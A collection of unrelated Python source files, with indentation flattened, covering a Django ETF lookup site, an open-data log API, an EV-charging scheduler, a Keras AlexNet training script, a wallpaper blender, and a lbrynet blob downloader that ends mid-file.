nilq/baby-python
|
python
|
from blackpearl.modules import Module
from blackpearl.modules import Timer
from blackpearl.projects import Project
class MyTimer(Timer):
tick = 0.1
def setup(self):
self.start()
class Listener(Module):
listening_for = ['timer']
def receive(self, message):
print(message['timer']['time'])
class MyProject(Project):
modules_required = [MyTimer, Listener,]
if __name__ == '__main__':
MyProject()
|
nilq/baby-python
|
python
|
from otree.api import *
c = Currency
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'payment_info'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
class Player(BasePlayer):
pass
# PAGES
class PaymentInfo(Page):
pass
page_sequence = [PaymentInfo]
|
nilq/baby-python
|
python
|
from src.grid.electrical_vehicle import EV
from collections import defaultdict
from typing import List
import numpy as np
class Scenario:
def __init__(self,
load_inds: list,
timesteps_hr: np.ndarray,
evs: List[EV],
power_price: np.ndarray,
):
""" Scenario aggregates information about EVs and power price .
load_inds -- indicis of the load nodes in the grid
timesteps_hr -- array of the timesteps
evs -- list of the EVs
power_price -- array specifying power price. Should have the same shape as timesteps_hr """
self.load_inds = load_inds
self.n_loads = len(load_inds)
self.power_price = power_price
self._setup_times(timesteps_hr)
self._setup_evs(evs)
assert power_price.shape == self.timesteps_hr.shape, 'Timesteps and power price shapes must be equal'
def _setup_times(self, timesteps_hr):
self.timesteps_hr = timesteps_hr
self.t_start_hr = timesteps_hr[0]
self.t_start_ind = 0
self.t_end_hr = timesteps_hr[-1]
self.n_timesteps = len(self.timesteps_hr)
self.t_end_ind = self.n_timesteps - 1
self.ptu_size_hr = timesteps_hr[1] - timesteps_hr[0]
self.ptu_size_minutes = int(60 * self.ptu_size_hr)
def _setup_evs(self, evs):
self.evs = evs
self.load_evs_presence = {load_ind: defaultdict(list) for load_ind in self.load_inds}
self.ev_status = defaultdict(dict)
self.t_ind_arrivals = defaultdict(list)
self.t_ind_departures = defaultdict(list)
self.t_ind_charging_evs = defaultdict(list)
self.load_ind_business = {load_ind: np.zeros(self.n_timesteps) for load_ind in self.load_inds}
for ev in evs:
# ev.utility_coef /= self.norm_factor
t_arr_ind = int(ev.t_arr_hr / self.ptu_size_hr)
t_dep_ind = int(ev.t_dep_hr / self.ptu_size_hr)
assert t_arr_ind == ev.t_arr_hr / self.ptu_size_hr and t_dep_ind == ev.t_dep_hr / self.ptu_size_hr, \
'EVs arrival and departure times should be rounded to PTU size !'
self.load_ind_business[ev.load_ind][t_arr_ind: t_dep_ind] = True
for t_ind in range(self.timesteps_hr.shape[0]):
if t_ind < t_arr_ind:
self.ev_status[ev][t_ind] = 'inactive'
elif t_ind == t_arr_ind:
self.ev_status[ev][t_ind] = 'arrive'
self.t_ind_arrivals[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_arr_ind < t_ind < t_dep_ind:
self.ev_status[ev][t_ind] = 'active'
self.t_ind_charging_evs[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_ind == t_dep_ind:
self.ev_status[ev][t_ind] = 'depart'
self.t_ind_departures[t_ind].append(ev)
self.load_evs_presence[ev.load_ind][t_ind].append(ev)
elif t_ind > t_dep_ind:
self.ev_status[ev][t_ind] = 'inactive'
def get_evs_known_at_t_ind(self, t_ind: int) -> List[EV]:
evs_known_at_t_ind = [ev for ev in self.evs if int(ev.t_arr_hr / self.ptu_size_hr) <= t_ind]
return evs_known_at_t_ind
def create_scenario_unknown_future(self, t_ind):
evs_known_at_t_ind = self.get_evs_known_at_t_ind(t_ind)
return Scenario(self.load_inds, self.timesteps_hr, evs_known_at_t_ind, self.power_price)
|
nilq/baby-python
|
python
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
import django.contrib.auth as auth
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from apps import EftConfig
from . import models as etf_models
import json
from parser import parse_by_symbol
def index(request):
return render(request, 'index.html', {})
def signup_view(request):
return render(request, 'signup.html', {})
def login(request):
if 'POST' != request.method:
return render(request, 'message.html',
{'message': 'login failed1'}, status=400)
if 'username' not in request.POST or 'password' not in request.POST:
return render(request, 'message.html',
{'message': 'login failed2'}, status=400)
username = request.POST['username']
password = request.POST['password']
# TODO more careful username and password validation
if username == '' or password == '':
return render(request, 'message.html',
{'message': 'login failed3'}, status=400)
# validation
user = auth.authenticate(username=username, password=password)
if None == user:
return render(request, 'message.html',
{'message': 'login failed4'}, status=400)
# login
auth.login(request, user)
# then redirect
return redirect('search')
def signup(request):
if 'POST' != request.method:
return render(request, 'message.html',
{'message': 'signup failed1'}, status=400)
post_data = request.POST
if 'username' not in post_data or 'password' not in post_data or \
'email' not in post_data or 'first_name' not in post_data or \
'last_name' not in post_data:
return render(request, 'message.html',
{'message': 'signup failed2'}, status=400)
username = post_data['username']
password = post_data['password']
email = post_data['email']
first_name = post_data['first_name']
last_name = post_data['last_name']
# TODO validate the input
try:
user = User.objects.create_user(username=username, password=password, email=email, first_name=first_name,
last_name=last_name)
user.save()
except Exception as e:
return render(request, 'message.html',
{'message': str(e)}, status=400)
return render(request, 'message.html',
{'message': 'register successfully'}, status=200)
def logout(request):
auth.logout(request)
return redirect('index')
@login_required
def search(request):
return render(request, 'search.html')
@login_required
def history(request):
return render(request, 'history.html')
### ajax apis #######
@login_required
def _history(request):
if not request.is_ajax():
return HttpResponse(json.dumps({'error': 'bad header'}), status=404,
content_type='application/json')
user = request.user
response_data = {
'records': [],
}
for record in etf_models.EtfRecord.objects.filter(user_id=user.id):
r = {}
r['symbol'] = record.symbol
r['etf_name'] = record.etf_name
r['fund_description'] = record.fund_description
response_data['records'].append(r)
return HttpResponse(json.dumps(response_data), status=200, content_type='application/json')
@login_required
def _search(request):
'''
data format example: {'symbol': 'DTS'}
'''
user = request.user
if 'GET' != request.method or not request.is_ajax():
return HttpResponse(json.dumps({'error': 'bad header'}), status=404,
content_type='application/json')
record = None
try :
# TODO validate the data,
symbol = request.GET['symbol']
# getting from db if possible
data = etf_models.EtfRecord.objects.filter(symbol=symbol)
if (len(data) > 0):
# no need to query again, it is in the db.
record = data[0]
except Exception as error:
error_msg = {
'error': str(error),
'user_msg': 'Server encountered an error'
}
return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400)
try:
if (None == record):
# need to parse from the website
etf_data = parse_by_symbol(symbol)
# save it to db
record = etf_models.EtfRecord.objects.create(user=user, symbol=etf_data['symbol'],
etf_name=etf_data['etf_name'],
fund_description=etf_data['fund_description'])
record.save()
for holding in etf_data['top_10_holdings']:
h = etf_models.Holding.objects.create(record=record, name=holding['name'],
weight=holding['weight'], shares=holding['shares'])
h.save()
for country_weight in etf_data['country_weights']:
cw = etf_models.CountryWeights.objects.create(record=record, country=country_weight['country'],
weight=country_weight['weight'])
cw.save()
for sector_weight in etf_data['sector_weights']:
sw = etf_models.SectorWeights.objects.create(record=record, sector=sector_weight['sector'],
weight=sector_weight['weight'])
sw.save()
except Exception as error:
# undo possible changes to db
data = etf_models.EtfRecord.objects.filter(symbol=symbol)
if (len(data) > 0):
record = data[0]
record.delete()
error_msg = {
'error': str(error),
'user_msg': 'invalid symbol'
}
# raise error # for debug
return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400)
# construct response
response_data = {}
response_data['fund_description'] = record.fund_description
response_data['etf_name'] = record.fund_description
response_data['symbol'] = symbol
top_10_holdings = []
for h in record.holding_set.all():
top_10_holdings.append({
'name': h.name,
'weight': h.weight,
'shares': h.shares
})
country_weights = []
for w in record.countryweights_set.all():
country_weights.append({
'country': w.country,
'weight': w.weight
})
sector_weights = []
for w in record.sectorweights_set.all():
sector_weights.append({
'sector': w.sector,
'weight': w.weight
})
response_data['top_10_holdings'] = top_10_holdings
response_data['country_weights'] = country_weights
response_data['sector_weights'] = sector_weights
return HttpResponse(json.dumps(response_data), status=200,
content_type='application/json')
@login_required
def download(request, table, symbol):
user = request.user
records = etf_models.EtfRecord.objects.filter(symbol=symbol)
if len(records) < 1:
return HttpResponse(status=404)
record = records[0]
if 'top10holdings' == table:
csv_data = 'name,weight,shares\n'
for holding in record.holding_set.all():
csv_data += '{0},{1},{2}\n'.format(holding.name, holding.weight, holding.shares)
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="holdings.csv"'
return response
elif 'countryweights' == table:
csv_data = 'country,weight\n'
for cw in record.countryweights_set.all():
csv_data += '{0},{1}\n'.format(cw.country, str(cw.weight)+'%')
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="country weight.csv"'
return response
elif 'sectorweights' == table:
csv_data = 'sector,weight\n'
for sw in record.sectorweights_set.all():
csv_data += '{0},{1}\n'.format(sw.sector, str(sw.weight)+'%')
response = HttpResponse(csv_data)
response['Content-Disposition'] = 'attachment;filename="sector weight.csv"'
return response
else:
return HttpResponse(status=404)
|
nilq/baby-python
|
python
|
from django.http import HttpResponse, StreamingHttpResponse
from django.views.decorators.csrf import csrf_exempt
from gzip import GzipFile
import tarfile
from io import BytesIO
from datetime import datetime
import json
import traceback
from psycopg2 import OperationalError
from interface.settings import PREVIEW_LIMIT, POSTGRES_CONFIG, FIELD_DESCRIPTIONS, HEARTBEAT, BASE_DIR, LOGS_TIME_BUFFER
from .postgresql_manager import PostgreSQL_Manager
import threading
import time
from .input_validator import load_and_validate_columns, load_and_validate_constraints, load_and_validate_date, load_and_validate_order_clauses
from logger_manager import LoggerManager
PGM = PostgreSQL_Manager(POSTGRES_CONFIG, FIELD_DESCRIPTIONS.keys(), LOGS_TIME_BUFFER)
LOGGER = LoggerManager(logger_name='opendata-interface', module_name='opendata',
heartbeat_dir=HEARTBEAT['dir'])
def heartbeat():
while True:
try:
PGM.get_min_and_max_dates()
LOGGER.log_heartbeat('Scheduled heartbeat', HEARTBEAT['api_file'], 'SUCCEEDED')
except OperationalError as operational_error:
LOGGER.log_heartbeat('PostgreSQL error: {0}'.format(str(operational_error).replace('\n', ' ')),
HEARTBEAT['api_file'], 'FAILED')
except Exception as exception:
LOGGER.log_heartbeat('Error: {0}'.format(str(exception).replace('\n', ' ')),
HEARTBEAT['api_file'], 'FAILED')
time.sleep(HEARTBEAT['interval'])
heartbeat_thread = threading.Thread(target=heartbeat)
heartbeat_thread.daemon = True
heartbeat_thread.start()
@csrf_exempt
def get_daily_logs(request):
try:
if request.method == 'GET':
request_data = request.GET
else:
request_data = json.loads(request.body.decode('utf8'))
date = load_and_validate_date(request_data.get('date', ''))
columns = load_and_validate_columns(request_data.get('columns', '[]'))
constraints = load_and_validate_constraints(request_data.get('constraints', '[]'))
order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]'))
except Exception as exception:
LOGGER.log_error('api_daily_logs_query_validation_failed',
'Failed to validate daily logs query. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(json.dumps({'error': str(exception)}), status=400)
try:
gzipped_file = _generate_gzipped_file(date, columns, constraints, order_clauses)
response = HttpResponse(gzipped_file, content_type='application/gzip')
response['Content-Disposition'] = 'attachment; filename="{0:04d}-{1:02d}-{2:02d}@{3}.tar.gz"'.format(
date.year, date.month, date.day, int(datetime.now().timestamp())
)
return response
except Exception as exception:
LOGGER.log_error('api_daily_logs_query_failed', 'Failed retrieving daily logs. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when generating gzipped tarball.'}),
status=500
)
@csrf_exempt
def get_preview_data(request):
try:
if request.method == 'GET':
request_data = request.GET
else:
request_data = json.loads(request.body.decode('utf8'))
date = load_and_validate_date(request_data.get('date', ''))
columns = load_and_validate_columns(request_data.get('columns', '[]'))
constraints = load_and_validate_constraints(request_data.get('constraints', '[]'))
order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]'))
except Exception as exception:
LOGGER.log_error('api_preview_data_query_validation_failed',
'Failed to validate daily preview data query. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(json.dumps({'error': str(exception)}), status=400)
try:
rows, _, _ = _get_content(date, columns, constraints, order_clauses, PREVIEW_LIMIT)
return_value = {'data': [[str(element) for element in row] for row in rows]}
return HttpResponse(json.dumps(return_value))
except Exception as exception:
LOGGER.log_error('api_preview_data_query_failed', 'Failed retrieving daily preview data. {0} ERROR: {1}'.format(
str(exception), traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when delivering dataset sample.'}),
status=500
)
@csrf_exempt
def get_date_range(request):
try:
min_date, max_date = PGM.get_min_and_max_dates()
return HttpResponse(json.dumps({'date': {'min': str(min_date), 'max': str(max_date)}}))
except Exception as exception:
LOGGER.log_error('api_date_range_query_failed', 'Failed retrieving date range for logs. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when calculating min and max dates.'}),
status=500
)
@csrf_exempt
def get_column_data(request):
postgres_to_python_type = {'varchar(255)': 'string', 'bigint': 'integer', 'integer': 'integer',
'date': 'date (YYYY-MM-DD)', 'boolean': 'boolean'}
type_to_operators = {
'string': ['=', '!='],
'boolean': ['=', '!='],
'integer': ['=', '!=', '<', '<=', '>', '>='],
'date (YYYY-MM-DD)': ['=', '!=', '<', '<=', '>', '>='],
}
try:
data = []
for column_name in FIELD_DESCRIPTIONS:
datum = {'name': column_name}
datum['description'] = FIELD_DESCRIPTIONS[column_name]['description']
datum['type'] = postgres_to_python_type[FIELD_DESCRIPTIONS[column_name]['type']]
datum['valid_operators'] = type_to_operators[datum['type']]
data.append(datum)
return HttpResponse(json.dumps({'columns': data}))
except Exception as exception:
LOGGER.log_error('api_column_data_query_failed', 'Failed retrieving column data. ERROR: {0}'.format(
traceback.format_exc().replace('\n', '')
))
return HttpResponse(
json.dumps({'error': 'Server encountered error when listing column data.'}),
status=500
)
def _generate_gzipped_file(date, columns, constraints, order_clauses):
rows, columns, date_columns = _get_content(date, columns, constraints, order_clauses)
tarball_bytes = BytesIO()
with tarfile.open(fileobj=tarball_bytes, mode='w:gz') as tarball:
data_file, data_info = _generate_json_file(columns, rows, date_columns, date)
meta_file, meta_info = _generate_meta_file(columns, constraints, order_clauses, date_columns)
tarball.addfile(data_info, data_file)
tarball.addfile(meta_info, meta_file)
return tarball_bytes.getvalue()
def _get_content(date, columns, constraints, order_clauses, limit=None):
constraints.append({'column': 'requestInDate', 'operator': '=', 'value': date.strftime('%Y-%m-%d')})
column_names_and_types = PGM.get_column_names_and_types()
if not columns: # If no columns are specified, all must be returned
columns = [column_name for column_name, _ in column_names_and_types]
date_columns = [column_name for column_name, column_type in column_names_and_types
if column_type == 'date' and column_name in columns]
rows = PGM.get_data(constraints=constraints, columns=columns, order_by=order_clauses, limit=limit)
return rows, columns, date_columns
def _generate_json_file(column_names, rows, date_columns, date):
json_content = []
for row in rows:
json_obj = {column_name: row[column_idx] for column_idx, column_name in enumerate(column_names)}
for date_column in date_columns: # Must manually convert Postgres dates to string to be compatible with JSON format
json_obj[date_column] = datetime.strftime(json_obj[date_column], '%Y-%m-%d')
json_content.append(json.dumps(json_obj))
json_content.append('') # Hack to get \n after the last JSON object
json_file_content = ('\n'.join(json_content)).encode('utf8')
info = tarfile.TarInfo(date.strftime('%Y-%m-%d') + '.json')
info.size = len(json_file_content)
info.mtime = time.time()
return BytesIO(json_file_content), info
def _generate_meta_file(columns, constraints, order_clauses, date_columns):
if 'requestInDate' not in date_columns:
date_columns += ['requestInDate']
meta_dict = {}
meta_dict['descriptions'] = {field: FIELD_DESCRIPTIONS[field]['description'] for field in FIELD_DESCRIPTIONS}
meta_dict['query'] = {'fields': columns, 'constraints': constraints,
'order_by': [' '.join(order_clause) for order_clause in order_clauses]}
content = json.dumps(meta_dict).encode('utf8')
info = tarfile.TarInfo('meta.json')
info.size = len(content)
info.mtime = time.time()
return BytesIO(content), info
def _gzip_content(content):
output_bytes = BytesIO()
with GzipFile(fileobj=output_bytes, mode='wb') as gzip_file:
input_bytes = BytesIO(content.encode('utf8'))
gzip_file.writelines(input_bytes)
return output_bytes.getvalue()
|
nilq/baby-python
|
python
|
import os.path
from PIL import Image
import json
appdata_folder = os.path.join(os.environ["LOCALAPPDATA"], "Nightshift")
def generate_wallpapers(day_img_path, night_img_path, step_count):
print "Generating {0} images from {1} and {2} to {3}"\
.format(step_count, day_img_path, night_img_path, appdata_folder)
if not os.path.exists(day_img_path) or not os.path.exists(night_img_path) \
or os.path.isdir(day_img_path) or os.path.isdir(night_img_path):
raise IOError("Day image or night image not found.")
_, day_ext = os.path.splitext(day_img_path)
_, night_ext = os.path.splitext(night_img_path)
if day_ext not in [".jpeg", ".jpg"] or night_ext not in [".jpeg", ".jpg"]:
print "Images will be converted to .jpg."
try:
day_image = Image.open(day_img_path)
night_image = Image.open(night_img_path)
except IOError:
print "Could not read image files."
raise
if day_image.size != night_image.size:
print "The two wallpapers must be the same size."
raise Exception("The two wallpapers must be the same size.")
try:
if not os.path.exists(appdata_folder):
os.mkdir(appdata_folder)
else:
cleanup_old_wallpapers()
blend_save_image(day_image, night_image, 0)
for step in range(1, step_count + 1):
opacity = step / float(step_count)
blend_save_image(day_image, night_image, opacity)
except:
print "Could not generate wallpapers."
raise
try:
output_file = open(os.path.join(appdata_folder, "images.json"), "w")
json.dump({"step_count": step_count,
"format": ".jpg"},
output_file)
output_file.close()
except IOError:
print "Could not write image settings."
raise
print "Images generated correctly."
def cleanup_old_wallpapers():
print "Cleaning up wallpaper directory."
for item in os.listdir(appdata_folder):
if item.endswith(".jpg"):
os.remove(os.path.join(appdata_folder, item))
def blend_save_image(day_image, night_image, opacity):
blended_image = Image.blend(day_image, night_image, opacity)
blended_image.save(os.path.join(appdata_folder, format(int(opacity * 255), "03d") + ".jpg"), quality=95)
blended_image.close()
def get_wallpaper_params():
print "Getting saved wallpaper params."
try:
file_obj = open(os.path.join(appdata_folder, "images.json"), "r")
result = json.load(file_obj)
file_obj.close()
return result
except IOError:
print "Could not read from wallpaper params file."
print "Try generating the wallpaper images with"
print "Nightshift.exe -g path_to_day_image path_to_night_image step_count"
raise
except:
print "Could not get saved location."
raise
|
nilq/baby-python
|
python
|
"""
adapted from keras example cifar10_cnn.py
Train ResNet-18 on the CIFAR10 small images dataset.
GPU run command with Theano backend (with TensorFlow, the GPU is automatically used):
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py
"""
from __future__ import print_function
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
from keras.preprocessing.image import ImageDataGenerator
from keras.utils import np_utils
from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping
import tensorflow as tf
import sys
import datetime
import os
import shutil
from keras.optimizers import Adam, Adadelta
from convnets import AlexNet_FCN
from datagenerator import data_gen
import keras.backend as K
import numpy as np
import dataloader
import datagenerator
from keras.backend.tensorflow_backend import set_session
from keras.metrics import top_k_categorical_accuracy
def top_3_accuracy(y_true, y_pred):
return top_k_categorical_accuracy(y_true, y_pred, k=3)
set_session(sess)
t = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
print(t)
batch_size = 32
nb_classes = 14
nb_epoch = 100
outs = 31
data_augmentation = True
# The data, shuffled and split between train and test sets:
dataset_fn = '../../../data_preprocessing/material_dataset.txt'
imgs_fn = '../../../../storage/center_227x227.npz'
weights_fn = '../../../../storage/alexnet_weights.h5'
#sz = 227
sz = 300
img_rows = sz
img_cols = sz
img_channels = 3
with tf.device('/gpu:0'):
lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6)
early_stopper = EarlyStopping(min_delta=0.001, patience=10)
csv_logger = CSVLogger('alexnet.csv')
#model = resnet.ResnetBuilder.build_resnet_18((img_channels, img_rows, img_cols), nb_classes)
#model = resnet.ResnetBuilder.build_resnet_50((img_channels, img_rows, img_cols), nb_classes)
model, outs = AlexNet_FCN(nb_classes=nb_classes, sz=sz)
#model = AlexNet(weights_fn, nb_classes=nb_classes, sz=sz)
#model = AlexNet(weights_fn, nb_classes=nb_classes)
print("outs", outs)
#opt = Adadelta(lr=0.01, rho=0.95, epsilon=1e-08, decay=0.0)
#opt = Adadelta(lr=1, rho=0.95, epsilon=1e-08, decay=0.0)
def sum_loss(y_true, y_pred):
y_true = K.reshape(y_true, [batch_size*outs*outs, nb_classes])
y_pred = K.reshape(y_pred, [batch_size*outs*outs, nb_classes])
s = K.mean(K.categorical_crossentropy(y_true, y_pred))
return s
opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
model.compile(#loss='categorical_crossentropy',
loss=sum_loss,
optimizer=opt,
#metrics=['accuracy', top_3_accuracy])
metrics=['accuracy'])
if data_augmentation:
print('Using real-time data augmentation.')
# This will do preprocessing and realtime data augmentation:
r = 0.2
datagen = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=r*100,
width_shift_range=r,
height_shift_range=r,
shear_range=r,
zoom_range=r,
channel_shift_range=r,
fill_mode='nearest',
cval=0.,
horizontal_flip=True,
vertical_flip=False,
rescale=None,
preprocessing_function=None)
# Compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied).
#datagen.fit(X_train)
def print_log(y_pred, Z, log_fn, k=5):
fout = open(log_fn, 'w')
acc1 = 0
acc3 = 0
cnt = 0
for i in range(0, len(y_pred), k):
img_fn = Z[i][0]
label = Z[i][1]
loc = Z[i][2]
print(img_fn, label, end=' ', file=fout)
y_sum = np.sum(y_pred[i:i+k], axis=0)
y_sum = np.sum(np.sum(y_sum, axis=0), axis=0)
y = [(j, y_sum[j]) for j in range(nb_classes)]
y_sorted = sorted(y, key=lambda d:d[1], reverse=True)
for j in y_sorted[:5]:
print(j[0], end=' ', file=fout)
print("", file=fout)
if y_sorted[0][0] == label:
acc1 += 1
if y_sorted[0][0] == label or y_sorted[1][0] == label or y_sorted[2][0] == label:
acc3 += 1
y_sum = np.zeros_like(y_pred[0])
cnt += 1
fout.close()
return acc1 * 1.0 / cnt, acc3 * 1.0 / cnt
def predict(model, val=True):
y_preds = []
Z = []
for (x, y, z) in datagenerator.test_generator(dataset_fn, imgs_fn, val=val, sz=img_rows):
y_pred = model.predict(x, batch_size=batch_size)
y_preds.append(y_pred)
Z = Z + z
y_preds = np.vstack(y_preds)
return y_preds, Z
log_dir = '../../../../result/alexnet/{}/'.format(t)
os.mkdir(log_dir)
shutil.copy('./fabric_train.py', log_dir+'fabric_train.py')
shutil.copy('./convnets.py', log_dir+'convnets.py')
G = data_gen('../../../data_preprocessing/material_dataset.txt', batch_size=batch_size, datagen=datagen, sz=sz, outs=outs)
# Fit the model on the batches generated by datagen.flow().
for epochs in range(nb_epoch):
model.fit_generator(#datagen.flow(X_train, Y_train, batch_size=batch_size),
#steps_per_epoch=X_train.shape[0] // batch_size,
G,
steps_per_epoch=500,
epochs=1, verbose=1, max_q_size=100)
#y_pred_valid = model.predict(X_valid, batch_size=batch_size)
#y_pred_test = model.predict(X_test, batch_size=batch_size)
y_pred_valid, Z_valid = predict(model, val=True)
y_pred_test, Z_test = predict(model, val=False)
k = 1
log_fn = log_dir + '.tmp.txt'
val_acc = print_log(y_pred_valid, Z_valid, log_fn, k=k)
test_acc = print_log(y_pred_test, Z_test, log_fn, k=k)
log_fn = log_dir + 'val_{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt'
print_log(y_pred_valid, Z_valid, log_fn, k=k)
log_fn = log_dir + '{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt'
print_log(y_pred_test, Z_test, log_fn, k=k)
print(epochs, val_acc, test_acc)
|
nilq/baby-python
|
python
|
class MiscUtils:
def __init__(self):
import requests
import json
r = requests.get("https://backpack.tf/filters")
obj = json.loads(r.text)
particles = obj['particle']
qualities = obj['quality']
rarities = obj['rarity']
paints = obj['paint']
origins = obj['origin']
wear_tiers = obj['wear_tiers']
killstreakers = obj['killstreakers']
sheens = obj['sheens']
killstreak_tiers = obj['killstreak_tiers']
strange_parts = obj['strange_parts']
self.particleObj = {}
self.qualitiesObj = {}
self.raritiesObj = {}
self.paintsObj = {}
self.originsObj = {}
self.wear_tiersObj = {}
self.killstreakers = {}
self.sheensObj = {}
self.killstreak_tiers = {}
self.strange_partsObj = {}
for particle in particles:
self.particleObj[particle['name'].lower()] = int(particle['id'])
for quality in qualities:
self.qualitiesObj[quality['name'].lower()] = int(quality['id'])
for rarity in rarities:
self.raritiesObj[rarity['name'].lower()] = int(rarity['id'])
for paint in paints:
self.paintsObj[paint['name'].lower()] = int(paint['id'])
for particle in origins:
self.originsObj[particle['name'].lower()] = int(particle['id'])
for particle in wear_tiers:
self.wear_tiersObj[wear_tiers[particle]['name'].lower()] = int(wear_tiers[particle]['id'])
for particle in killstreakers:
self.killstreakers[particle['name'].lower()] = int(particle['id'])
for particle in sheens:
self.sheensObj[particle['name'].lower()] = int(particle['id'])
for particle in killstreak_tiers:
self.killstreak_tiers[particle['name'].lower()] = int(particle['id'])
for particle in strange_parts:
self.strange_partsObj[particle['name'].lower()] = int(particle['id'])
#
# Converts quality string to quality int
#
def quality_String_To_Int(self, string):
try:
return self.qualitiesObj[string.lower()]
except:
return ""
#
# Converts particle string to particle int
#
def particle_String_To_Int(self, string):
try:
return self.particleObj[string.lower()]
except:
return ""
#
# Converts rarity string to rarity int
#
def rarity_String_To_Int(self, string):
try:
return self.raritiesObj[string.lower()]
except:
return ""
#
# Origin quality string to origin int
#
def origin_String_To_Int(self, string):
try:
return self.originsObj[string.lower()]
except:
return ""
#
# Converts wear_tier string to wear_tier int
#
def wear_tier_String_To_Int(self, string):
try:
return self.wear_tiersObj[string.lower()]
except:
return ""
#
# Converts killstreaker string to killstreaker int
#
def killstreaker_String_To_Int(self, string):
try:
return self.killstreakers[string.lower()]
except:
return ""
#
# Converts sheen string to sheen int
#
def sheen_String_To_Int(self, string):
try:
return self.sheensObj[string.lower()]
except:
return ""
#
# Converts killstreak_tier string to killstreak_tier int
#
def killstreak_tier_String_To_Int(self, string):
try:
return self.killstreak_tiers[string.lower()]
except:
return ""
#
# Converts strange_part string to strange_part int
#
def strange_parts_String_To_Int(self, string):
try:
return self.strange_partsObj[string.lower()]
except:
return ""
#
# Converts paint string to paint int
#
def paint_String_To_Int(self, string):
try:
return self.paintsObj[string.lower()]
except:
return ""
#
# Converts steam ID into the account_id account ID is used in trading requests
#
def steam_id_to_account_id(self, steam_id):
import struct
return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
|
nilq/baby-python
|
python
|
import asyncio
import typing
import logging
from lbrynet.utils import drain_tasks
from lbrynet.blob_exchange.client import request_blob
if typing.TYPE_CHECKING:
from lbrynet.conf import Config
from lbrynet.dht.node import Node
from lbrynet.dht.peer import KademliaPeer
from lbrynet.blob.blob_manager import BlobFileManager
from lbrynet.blob.blob_file import BlobFile
log = logging.getLogger(__name__)
class BlobDownloader:
BAN_TIME = 10.0 # fixme: when connection manager gets implemented, move it out from here
def __init__(self, loop: asyncio.BaseEventLoop, config: 'Config', blob_manager: 'BlobFileManager',
peer_queue: asyncio.Queue):
self.loop = loop
self.config = config
self.blob_manager = blob_manager
self.peer_queue = peer_queue
self.active_connections: typing.Dict['KademliaPeer', asyncio.Task] = {} # active request_blob calls
self.ignored: typing.Dict['KademliaPeer', int] = {}
self.scores: typing.Dict['KademliaPeer', int] = {}
self.connections: typing.Dict['KademliaPeer', asyncio.Transport] = {}
self.time_since_last_blob = loop.time()
def should_race_continue(self, blob: 'BlobFile'):
if len(self.active_connections) >= self.config.max_connections_per_download:
return False
# if a peer won 3 or more blob races and is active as a downloader, stop the race so bandwidth improves
# the safe net side is that any failure will reset the peer score, triggering the race back
# TODO: this is a good idea for low bandwidth, but doesnt play nice on high bandwidth
# for peer, task in self.active_connections.items():
# if self.scores.get(peer, 0) >= 0 and self.rounds_won.get(peer, 0) >= 3 and not task.done():
# return False
return not (blob.get_is_verified() or blob.file_exists)
async def request_blob_from_peer(self, blob: 'BlobFile', peer: 'KademliaPeer'):
if blob.get_is_verified():
return
self.scores[peer] = self.scores.get(peer, 0) - 1 # starts losing score, to account for cancelled ones
transport = self.connections.get(peer)
start = self.loop.time()
bytes_received, transport = await request_blob(
self.loop, blob, peer.address, peer.tcp_port, self.config.peer_connect_timeout,
self.config.blob_download_timeout, connected_transport=transport
)
if bytes_received == blob.get_length():
self.time_since_last_blob = self.loop.time()
if not transport and peer not in self.ignored:
self.ignored[peer] = self.loop.time()
log.debug("drop peer %s:%i", peer.address, peer.tcp_port)
if peer in self.connections:
del self.connections[peer]
elif transport:
log.debug("keep peer %s:%i", peer.address, peer.tcp_port)
self.connections[peer] = transport
rough_speed = (bytes_received / (self.loop.time() - start)) if bytes_received else 0
self.scores[peer] = rough_speed
async def new_peer_or_finished(self, blob: 'BlobFile'):
async def get_and_re_add_peers():
try:
new_peers = await asyncio.wait_for(self.peer_queue.get(), timeout=1.0)
self.peer_queue.put_nowait(new_peers)
except asyncio.TimeoutError:
pass
tasks = [self.loop.create_task(get_and_re_add_peers()), self.loop.create_task(blob.verified.wait())]
active_tasks = list(self.active_connections.values())
try:
await asyncio.wait(tasks + active_tasks, loop=self.loop, return_when='FIRST_COMPLETED')
finally:
drain_tasks(tasks)
def cleanup_active(self):
to_remove = [peer for (peer, task) in self.active_connections.items() if task.done()]
for peer in to_remove:
del self.active_connections[peer]
def clearbanned(self):
now = self.loop.time()
if now - self.time_since_last_blob > 60.0:
return
